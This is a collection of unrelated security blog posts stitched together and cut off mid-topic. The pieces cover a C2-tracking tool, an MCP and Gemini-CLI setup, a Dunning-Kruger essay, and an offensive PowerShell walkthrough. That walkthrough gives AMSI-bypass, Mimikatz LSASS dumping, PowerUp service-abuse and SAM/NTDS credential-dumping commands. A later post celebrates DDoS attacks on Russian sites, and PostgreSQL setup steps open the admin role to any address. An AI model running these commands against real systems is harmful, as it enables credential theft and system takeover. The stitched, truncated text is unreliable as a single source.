In the 2010s, the rise of social media and cloud services brought a new shift in C2 tactics. Cyber attackers quickly started using platforms like Twitter, Google Docs, and GitHub for their C2 operations. This made it much harder to spot malicious activity because commands could be hidden in ordinary tweets or documents. Additionally, using major cloud providers made their operations more reliable and resilient.
The Modern C2 Landscape
Todayβs C2 systems use advanced evasion techniques to avoid detection. Domain fronting hides malicious traffic behind legitimate, high-reputation websites. Fast flux networks constantly change the IP addresses linked to C2 domains, making it difficult to block them. Some attackers even use steganography to hide commands in images or other harmless-looking files.
One of the latest trends is blockchain-based C2 systems, which use cryptocurrency networks for covert communication. This approach takes advantage of blockchainβs decentralized and anonymous features, creating new challenges for tracking and identifying these threats.
Blockchain transaction diagrams used by Glupteba botnet
The Rise of C2 Tracking Tools
With C2 servers being so crucial in cyber attacks, developing effective tracking tools has become really important. By mapping out how different attackers set up their C2 systems, these tools provide insights into their tactics and capabilities. This helps link attacks to specific groups and track changes in methods over time.
Additionally, this data helps with proactive threat hunting, letting security teams search for signs of C2 communication within their networks and find hidden compromises. On a larger scale, C2 tracking tools offer valuable intelligence for law enforcement and cybersecurity researchers, supporting takedown operations and the creation of new defense strategies.
C2 Tracker
C2 Tracker is a free, community-driven IOC feed that uses Shodan and Censys searches to gather IP addresses of known malware, botnets, a
nd C2 infrastructure.
This feed is available on GitHub and is updated weekly. You can view the results
Add your Shodan API key as the environment variable SHODAN_API_KEY, and set up your Censys credentials with CENSYS_API_ID and CENSYS_API_SECRET.
kali> python3 -m pip install -r requirements.txt
kali> python3 tracker.py
In the data directory, you can see the results:
Letβs take a look at some of the IP addresses of GoPhish servers.
Shodan shows that the default port 3333 is open.
When opened, we can see the authorization form.
Now, letβs move on to our main objective, finding command and control (C2) servers.
For instance, letβs look at the cobalt Strike IP addresses.
We have 827 results!
Each of these IP addresses represents a Cobalt Strike C2 server.
Summary
Cyber Threat Intelligence is crucial to stay ahead of the bad guys. Tools like C2 Tracker are essential to providing you a clear picture of the threat landscape. They help by spotting threats early, aiding in incident response, and supporting overall security efforts. These tools improve our ability to detect, prevent, and handle cyber threats.
In the past few years, large language models have moved from isolated research curiosities to practical assistants that answer questions, draft code, and even automate routine tasks. Yet those models remain fundamentally starved for live, organization-specific data because they operate on static training datasets.
The Model Context Protocol (MCP) was created to bridge that gap. By establishing a universal, standards-based interface between an AI model and the myriad external resources a modern enterprise maintains, like filesystems, databases, web services, and tools, MCP turns a text generator into a βcontext-awareβ agent.
Letβs explore what MCP is and how we can start using it for hacking and cybersecurity!
Step #1: What is Model Context Protocol?
Model Context Protocol is an open standard introduced by Anthropic that enables AI assistants to connect to systems where data lives, including content repositories, business tools, and development environments. The protocol functions like a universal port for AI applications, providing a standardized way to connect AI systems to external data sources, tools, and workflows.
Before MCP existed, developers faced whatβs known as the βNΓM integration problem.β If you wanted to connect five different AI assistants to ten different data sources, youβd theoretically need fifty different custom integrations. Each connection required its own implementation, its own authentication mechanism, and its own maintenance overhead. For cybersecurity teams trying to integrate AI into their workflows, this created an impossible maintenance burden.
MCP replaces these fragmented integrations with a single protocol that works across any AI system and any data source. Instead of writing custom code for each connection, security professionals can now use pre-built MCP servers or create their own following a standard specification.
Step #2: How MCP Actually Works
The MCP architecture consists of three main components working together: hosts, clients, and servers.
The host is the application you interact with directly, such as Claude Desktop, an integrated development environment, or a security operations platform. The host manages the overall user experience and coordinates communication between different components.
Within each host lives one or more clients. These clients establish one-to-one connections with MCP servers, handling the actual protocol communication and managing data flow. The client is responsible for sending requests to servers and processing their responses. For security applications, this means the client handles tool invocations, resource requests, and security context.
The servers are where the real action happens. MCP servers are specialized programs that expose specific functionality through the protocol framework. A server might provide access to vulnerability scanning tools, network reconnaissance capabilities, or forensic analysis functions.
MCP supports multiple transport mechanisms, including standard input/output for local processes and HTTP with Server-Sent Events for remote communication.
The protocol defines several message types that flow between clients and servers.
Requests expect a response and might ask a server to perform a network scan or retrieve vulnerability data. Results are successful responses containing the requested information. Errors indicate when something went wrong, which is critical for security operations where failed scans or timeouts need to be handled gracefully. Notifications are one-way messages that donβt expect responses, useful for logging events or updating status.
Step #3: Setting Up Docker Desktop
To get started, we need to install Docker Desktop. But if youβre looking for a bit more privacy and have powerful hardware, you can download LM Studio and run local LLMs.
To install Docker Desktop in Kali Linux, run the following command:
kali> sudo apt install docker-desktop -y
But if youβre running Kali in a virtualization app like VirtualBox, you might see the following error:
To fix that, you need to turn on βNested VT-x/AMD-Vβ.
After restarting VM and Docker Desktop, you should see the following window.
After accepting, youβll be ready to explore MCP features.
Now, we just need to choose the MCP server to run.
At the time of writing, there are 266 different MCP servers. Letβs explore one of them, for example, the DuckDuckGo MCP server that provides web search capabilities.
ClickingΒ ToolsΒ reveals the utilities the MCP server offers and explains each purpose in plain language. In this case, there are just two tools:
Step #4: Setting Up Gemini-CLI
By clicking on Clients in Docker Desktop, we can see which LLMs can interact with Docker Desktop.
For this example, Iβll be using Gemini CLI. But letβs install it first:
kali> sudo apt install gemini-cli
Letβs start it:
kali> gemini-cli
To get started, we need to authenticate. If youβd like to change the login option, click the upβ or downβarrow buttons. After authorization, youβll be able to communicate with the general Geminiβ―AI.
Now, weβre ready to connect the client.
After restarting, we can see a message about the connection to MCP.
By clicking Ctrl+T, we can see the MCP settings:
Letβs try to search by DuckDuckGo MCP in Gemini-CLI.
After accepting the execution, we got the response.
By scrolling through the results, we can see in the end a summary from Gemini AI from a search done by the DuckDuckGo search engine.
Summary
I hope this brief article introduced you to this fundamentally innovative technique. In this piece, we covered the basics of MCP architecture, set up our own environment, and ran an MCP server. I used a very simple example, but as you saw, there are more than 250 MCP servers in the catalog, and even more on platforms like GitHub, so the potential for cybersecurity and IT in general is huge.
Keep returning as we continue to explore MCP and eventually develop our own MCP server for hacking purposes.
If youβve spent any time in cybersecurity, youβve probably met someone who sounds absolutely certain theyβve mastered it all after a few YouTube tutorials. Maybe youβve even been that person. Thatβs not arrogance, it is the Dunning-Kruger effect in action.
What the Dunning-Kruger Effect Means
The Dunning-Kruger effect is what happens when people know just enough to overestimate their ability. Itβs the moment you think you understand a topic right before you realize how much more there is to learn.
The name comes from psychologists David Dunning and Justin Kruger, who ran a series of studies in the 1990s which revealed that people who perform poorly on a task tended to overestimate their performance. Their results showed a simple truth: regardless of skill, most people think their abilities are above average.
The robbers who attempted to evade security camera with lemon juice inspired the research of the DunningβKruger effect
In technology, this shows up in familiar ways. A beginner writes a few lines of Python and claims to have built a revolutionary app. Someone installs a VPN and believes theyβre βunhackable.β Confidence often runs ahead of experience, not out of arrogance, but because the limits of a skill are invisible until youβve spent considerable time inside it.
Even advanced practitioners can fall into a quieter version of the same trap. A network engineer might assume their firewall rules cover every scenario, only to discover a misconfigured port exposing internal systems.
Donβt Mistake Confidence for Competence
If youβre new to cybersecurity, the hardest thing isnβt learning the tools, itβs learning who to listen to. Many online spaces reward confidence, not accuracy. Forums, Discord channels, and YouTube comments are full of people who sound certain, but certainty is cheap. Real knowledge explains why something works, not just what to do.
Before taking advice, look for someone who admits what they donβt know. Theyβre often the ones worth learning from.
The Subtle Curve of Growth
This classic βMount Stupidβ graph paints a neat story: confidence soars, crashes, then climbs again with knowledge. Itβs a good metaphor, but real growth isnβt always that tidyand self-awareness can develop unevenly.
Progress in cybersecurity isnβt about avoiding mistakes, itβs about calibrating your confidence to match your understanding. When your ego and your knowledge move in step, your knowledge and understanding deepens
How to Avoid the Dunning-Kruger Trap
Keep learning even when you feel confident. Real skill isnβt a destination, itβs maintenance.
Ask for feedback early and often. Donβt trust your instincts alone to judge your skill.
Challenge your assumptions. If something feels obvious, double-check it. Most technical errors hide in what βeveryone knows.β
Watch for loud certainty online. The best experts usually explain, not declare.
Why the Internet Makes It Worse
The internet accelerates the illusion of knowledge. Everyone can Google a few terms, read an AI summary, and start giving advice. The illusion of knowledge spreads fast when thereβs no built-in pause between βlearning somethingβ and βapplying itβ. Knowing where to click isnβt the same as understanding whatβs happening under the hood.
Donβt fall victim to confident AI hallucinations
Donβt Mistake Confidence for Competence
If youβre just starting out, be careful not to mistake confidence for competence. Online, certainty often outshines understanding. The trick is to listen critically. Ask questions, check sources, and test things yourself. Real understanding holds up under scrutiny. If someone canβt explain why something works, they probably donβt understand it as well as they think they do.
Keep Learning and Stay Curious
The good news is that most people eventually grow out of Mount Stupid. The best engineers, hackers, and sysadmins are the ones whose competence outpaces their confidence and arenβt afraid to admit when they donβt know something. Curiosity replaces confidence, and discussions start sounding more like: βWhat happens if I do this?β instead of βI already know how this works.β
In the end, the Dunning-Kruger effect isnβt just about ignorance. Itβs a stage of learning, a rite of passage in everything, including cybersecurity. At Hackers-Arise, we believe in learning through experience, the kind that teaches you persistence and makes you a creative thinker.
If youβre ready for your competence to match your confidence you should start with our Cybersecurity Starter Bundle.
For quite an extensive period of time we have been covering different ways PowerShell can be used by hackers. We learned the basics of reconnaissance, persistence methods, survival techniques, evasion tricks, and mayhem methods. Today we are continuing our study of PowerShell and learning how we can automate it for real hacking tasks such as privilege escalation, AMSI bypass, and dumping credentials. As you can see, PowerShell may be used to exploit systems, although it was never created for this purpose. Our goal is to make it simple for you to automate exploitation during pentests. Things that are usually done manually can be automated with the help of the scripts we are going to cover. Letβs start by learning about AMSI.
AMSI is the Antimalware Scan Interface. It is a Windows feature that sits between script engines like PowerShell or Office macros and whatever antivirus or EDR product is installed on the machine. When a script or a payload is executed, the runtime hands that content to AMSI so the security product can scan it before anything dangerous runs. It makes scripts and memory activity visible to security tools, which raises the bar for simple script-based attacks and malware. Hackers constantly try to find ways to keep malicious content from ever being presented to it, or to change the content so it wonβt match detection rules. You will see many articles and tools that claim to bypass AMSI, but soon after they are released, Microsoft patches the vulnerabilities. Since itβs important to be familiar with this attack, letβs test our system and try to patch AMSI.
First we need to check if the Defender is running on a Russian target:
As you know by now, there are a few ways to execute scripts in PowerShell. We will use a basic one for demonstration purposes:
PS > .\shantanukhande-amsi.ps1
If your output matches ours, then AMSI has been successfully patched. From now on, the Defender does not have access to your PowerShell sessions and any kind of scripts can be executed in it without restriction. Itβs important to mention that some articles on AMSI bypass will tell you that downgrading to PowerShell Version 2 helps to evade detection, but that is not true. At least not anymore. Defender actively monitors all of your sessions and these simple tricks will not work.
Since you are free to run anything you want, we can execute Mimikatz right in our session. Note that we are using Invoke-Mimikatz.ps1 by g4uss47, and it is the updated PowerShell version of Mimikatz that actually works. For OPSEC reasons we do not recommend running Mimikatz commands that touch other hosts because network security products might pick this up. Instead, letβs dump LSASS locally and inspect the results:
Now we have the credentials of brandmanager. If we compromised a more valuable target in the domain, like a server or a database, we could expect domain admin credentials. You will see this quite often.
Privilege Escalation with PowerUp
Privilege escalation is a complex topic. Frequently systems will be misconfigured and people will feel comfortable without realizing that security risks exist. This may allow you to skip privilege escalation altogether and jump straight to lateral movement, since the compromised user already has high privileges. There are multiple vectors of privilege escalation, but among the most common ones are unquoted service paths and insecure file permissions. While insecure file permissions can be easily abused by replacing the legitimate file with a malicious one of the same name, unquoted service paths may require more work for a beginner. Thatβs why we will cover this attack today with the help of PowerUp. Before we proceed, itβs important to mention that this script has been known to security products for a long time, so be careful.
Finding Vulnerable Services
Unquoted Service Path is a configuration mistake in Windows services where the full path to the service executable contains spaces but is not wrapped in quotation marks. Because Windows treats spaces as separators when resolving file paths, an unquoted path like C:\Program Files\My Service\service.exe can be interpreted ambiguously. The system may search for an executable at earlier, shorter segments of that path (for example C:\Program.exe or C:\Program Files\My.exe) before reaching the intended service.exe. A hacker can place their own executable at one of those earlier locations, and the system will run that program instead of the real service binary. This works as a privilege escalation method because services typically run with higher privileges.
Now letβs test the service names and see which one will get us local admin privileges:
PS > Invoke-ServiceAbuse -Name 'Service Name'
If successful, you should see the name of the service abused and the command it executed. By default, the script will create and add user john to the local admin group. You can edit it to fit your needs.
The results can be tested:
PS > net user john
Now we have an admin user on this machine, which can be used for various purposes.
With enough privileges we can dump NTDS and SAM without having to deal with security products at all, just with the help of native Windows functions. Usually these attacks require multiple commands, as dumping only NTDS or only a SAM hive does not help. For this reason, we have added a new script to our repository. It will automatically identify the type of host you are running it on and dump the needed files. NTDS only exists on Domain Controllers and contains the credentials of all Active Directory users. This file cannot be found on regular machines. Regular machines will instead be exploited by dumping their SAM and SYSTEM hives. The script is not flagged by any AV product. Below you can see how it works.
Attacking SAM on Domain Machines
To avoid issues, bypass the execution policy:
PS > powershell -ep bypass
Then dump SAM and SYSTEM hives:
PS > .\ntds.ps1
Wait a few seconds and find your files in C:\Temp. If the directory does not exist, it will be created by the script.
Next we need to exfiltrate these files and extract the credentials:
bash$ > secretsdump.py -sam SAM -system SYSTEM LOCAL
Attacking NTDS on Domain Controllers
If you have already compromised a domain admin, or managed to escalate your privileges on the Domain Controller, you might want to get the credentials of all users in the company.
We often use Evil-WinRM to avoid unnecessary GUI interactions that are easy to spot. Evil-WinRM allows you to load all your scripts from the machine so they will be executed without touching the disk. It can also patch AMSI, but be really careful.
Evil-WinRM has a download command that can help you extract the files. After that, run this command:
bash$ > secretsdump.py -ntds ntds.dit -sam SAM -system SYSTEM LOCAL
Summary
In this chapter, we explored how PowerShell can be used for privilege escalation and complete domain compromise. We began with bypassing AMSI to clear the way for running offensive scripts without interference, then moved on to credential dumping with Mimikatz. From there, we looked at privilege escalation techniques such as unquoted service paths with PowerUp, followed by dumping NTDS and SAM databases once higher privileges were achieved. Each step builds on the previous one, showing how hackers chain small misconfigurations into full organizational takeover. Defenders should also be familiar with these attacks as it will help them tune the security products. For instance, harmless actions such as creating a shadow copy to dump NTDS and SAM can be spotted if you monitor Event ID 8193 and Event ID 12298. Many activities can be monitored, even benign ones. It depends on where defenders are looking at.
In this series, we will detail how an individual or small group of cyberwarriors can impact global geopolitics. The knowledge and tools that YOU hold are a superpower that can change history.
Use it wisely.
To begin this discussion, letβs look at the actions of a small group of hackers at the outset of the Russian invasion of Ukraine. We will detail these actions up to the present, attempting to demonstrate that even a single individual or small group can influence global outcomes in our connected digital world. Cyber war is real and even a single individual can have an impact on global political outcomes.
Letβs begin in February 2022, nearly 3 years ago. At that time, Ukraine was struggling to throw off the yoke of Russian domination. As a former member state of the Soviet Union (the successor to the Romanovβs Russian Empire), they declared their independence, like so many former Soviet republics (such as Estonia, Latvia, Lithuania, Georgia, Armenia, Kazakhstan, and others) from that failed and brutal alliance in 1991 (this is the moment that the Soviet Union disintegrated). This union failed primarily due to the inability of the Soviet Union to address the needs of their citizens. Simple things like food, clean water, and consumer goods. And, of course, the tyranny.
Russia, having lost absolute control of these nations, attempted to maintain influence and control by bending their leaders to Putinβs will. In Ukraine, this meant a string of leaders who answered to Putin, rather than the Ukrainian people. In addition, Russian state-sponsored hackers such as Sandworm, attacked Ukraineβs digital infrastructure repeatedly to create chaos and confusion within the populace. This included the famous BlackEnergy3 attack in 2014 against the Ukrainian power transmission system that blacked out large segments of Ukraine in the depths of winter (for more on this and other Russian cyberattacks against Ukraine, read this article).
In February 2022, the US and Western intelligence agencies warned of an imminent attack from Russia on Ukraine. In an unprecedented move, the US president and the intelligence community revealed, (based upon satellite and human intelligence-) that Russia was about to invade Ukraine. The new Ukrainian president, Volodymyr Zelenskyy, publicly denied and tried to minimize the probability that an attack was about to take place. Zelenskyy had been a popular comedian and actor in Ukraine (there is a Netflix comedy made by Zelenskyy before he became president named βServant of the Peopleβ) and was elected president in a landslide election as the people of Ukraine attempted to clean Russian domination from their politics and become part of the free Europe. Zelenskyy may have denied the likelihood of a Russian attack to bolster the public mood in Ukraine and not anger the Russian leader (Ukraine and Russia have long family ties on both sides of the border) .
We at Hackers-Arise took these warnings to heart and started to prepare.
List of Targets in Russia
First, we enumerated the key websites and IP addresses of critical and essential Russian military and commercial interests. There was no time to do extensive vulnerability research on each of those sites with the attack imminent, so instead, we readied one of the largest DDoS attacks in history! The goal was to disable the Russiansβ ability to use their websites and digital communications to further their war ends and cripple their economy. This is exactly the same tactic that Russia had used in previous cyber wars against their former republics, Georgia and Estonia. In fact, at the same time, Russian hackers had compromised the ViaSat satellite internet service and were about to send Ukraine and parts of Europe into Internet darkness (read about this attack here).
We put out the word to hackers around the world to prepare. Tens of thousands of hackers prepared to protect Ukraineβs sovereignty. Eventually, when Russian troops crossed the border into Ukraine on February 24, 2022, we were ready. At this point in time, Ukraine created the IT Army of Ukraine and requested assistance from hackers across the world, including Hackers-Arise.
Within minutes, we launched the largest DDoS attack the Russians had ever seen, over 760GB/sec (as documented later by the Russian telecom provider, Rostelcom). This was twice the size of any DDoS attack in Russian history (https://www.bleepingcomputer.com/news/security/russia-s-largest-isp-says-2022-broke-all-ddos-attack-records/) This attack was a coordinated DDoS attack against approximately 50 sites in Russia such as the Department of Defense, the Moscow Stock Exchange, Gazprom, and other key commercial and military interests.
As a result of this attack, Russian military and commercial interests were hamstrung. Websites were unreachable and communication was hampered. After the fact, Russian government leaders estimated that 17,000 IP addresses had participated and they vowed to exact revenge on all 17,000 of us (we estimated the actual number was closer to 100,000).
This massive DDoS attack, unlike any Russia had ever seen and totally unexpected by Russian leaders, hampered the coordination of military efforts and brought parts of the Russian economy to its knees. The Moscow Stock Exchange shut down and the largest bank, Sberbank, closed. This attack continued for about 6 weeks and effectively sent the message to the Russian leaders that the global hacker/cyberwarrior community opposed their aggression and was willing to do something about it. This was a
first in the history of the world!
The attack was simple in the context of DDoS attacks. Most DDoS attacks in our modern era involve layer 7 resources to make sites unavailable, but this one was simply an attack to clog the pipelines in Russia with βgarbageβ traffic. It worked. It worked largely because Russia was arrogant and unprepared without adequate DDoS protection from the likes of Cloudflare or Radware.
Within days, we began a new campaign to target the Russian oligarchs, the greatest beneficiaries of Putinβs kleptocracy (you can read more about it here). These oligarchs are complicit in robbing the Russian people of their resources and income for their benefit. They are the linchpin that keeps the murderer, Putin, in power. In this campaign, initiated by Hackers-Arise, we sought to harass the oligarchs in their yachts throughout the world (the oligarchs escape Russia whenever they can). We sought to first (1) identify their yachts, then (2) locate their yachts, and finally (3) send concerned citizens to block their fueling and re-supply. In very short order, this campaign evolved into a program to capture these same super yachts and hold them until the war was over, eventually to sell and raise funds to rebuild Ukraine. We successfully identified, located, and seized the top 9 oligarch yachts (worth billions of USD), including Putinβs personal yacht (this was the most difficult). All of them were seized by NATO forces and are still being held.
In the next few posts here we will detail;
The request from the Ukraine Army to hack IP cameras in Ukraine for surveillance and our success in doing so;
The attacks against Russian industrial systems resulted in damaging fires and other malfunctions.
Look for Master OTWβs book, βA Cyberwarrior Handbookβ, coming in 2026.
Vulnerability scanning is the process of using automated tools to identify potential security weaknesses and vulnerabilities in an organizationβs infrastructure. It is an essential step in maintaining the security of a system as it helps identify any potential points of attack or entry for malicious actors. In 2023, vulnerability scanning will be more essential than [β¦]
Output: Enter name of role to add: admin Shall the new role be a superuser? (y/n) y
Create the dc_sonar_workers_layer database account:
sudo -u postgres createuser --interactive
Output: Enter name of role to add: dc_sonar_workers_layer Shall the new role be a superuser? (y/n) n Shall the new role be allowed to create databases? (y/n) n Shall the new role be allowed to create more new roles? (y/n) n
Create the dc_sonar_user_layer database account:
sudo -u postgres createuser --interactive
Output: Enter name of role to add: dc_sonar_user_layer Shall the new role be a superuser? (y/n) n Shall the new role be allowed to create databases? (y/n) n Shall the new role be allowed to create more new roles? (y/n) n
Create the back_workers_db database:
sudo -u postgres createdb back_workers_db
Create the web_app_db database:
sudo -u postgres createdb web_app_db
Run the psql:
sudo -u postgres psql
Set a password for the admin account:
ALTER USER admin WITH PASSWORD '{YOUR_PASSWORD}';
Set a password for the dc_sonar_workers_layer account:
ALTER USER dc_sonar_workers_layer WITH PASSWORD '{YOUR_PASSWORD}';
Set a password for the dc_sonar_user_layer account:
ALTER USER dc_sonar_user_layer WITH PASSWORD '{YOUR_PASSWORD}';
Grant CRUD permissions for the dc_sonar_workers_layer account on the back_workers_db database:
\c back_workers_db GRANT CONNECT ON DATABASE back_workers_db to dc_sonar_workers_layer; GRANT USAGE ON SCHEMA public to dc_sonar_workers_layer; GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_workers_layer; GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_workers_layer; GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_workers_layer;
Grant CRUD permissions for the dc_sonar_user_layer account on the web_app_db database:
\c web_app_db GRANT CONNECT ON DATABASE web_app_db to dc_sonar_user_layer; GRANT USAGE ON SCHEMA public to dc_sonar_user_layer; GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_user_layer; GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_user_layer; GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_user_layer;
Exit of the psql:
\q
Open the pg_hba.conf file:
sudo nano /etc/postgresql/12/main/pg_hba.conf
Add the line for the connection to allow the connection from the host machine to PostgreSQL, save changes and close the file:
# IPv4 local connections: host all all 127.0.0.1/32 md5 host all admin 0.0.0.0/0 md5
Open the postgresql.conf file:
sudo nano /etc/postgresql/12/main/postgresql.conf
Change specified below params, save changes and close the file: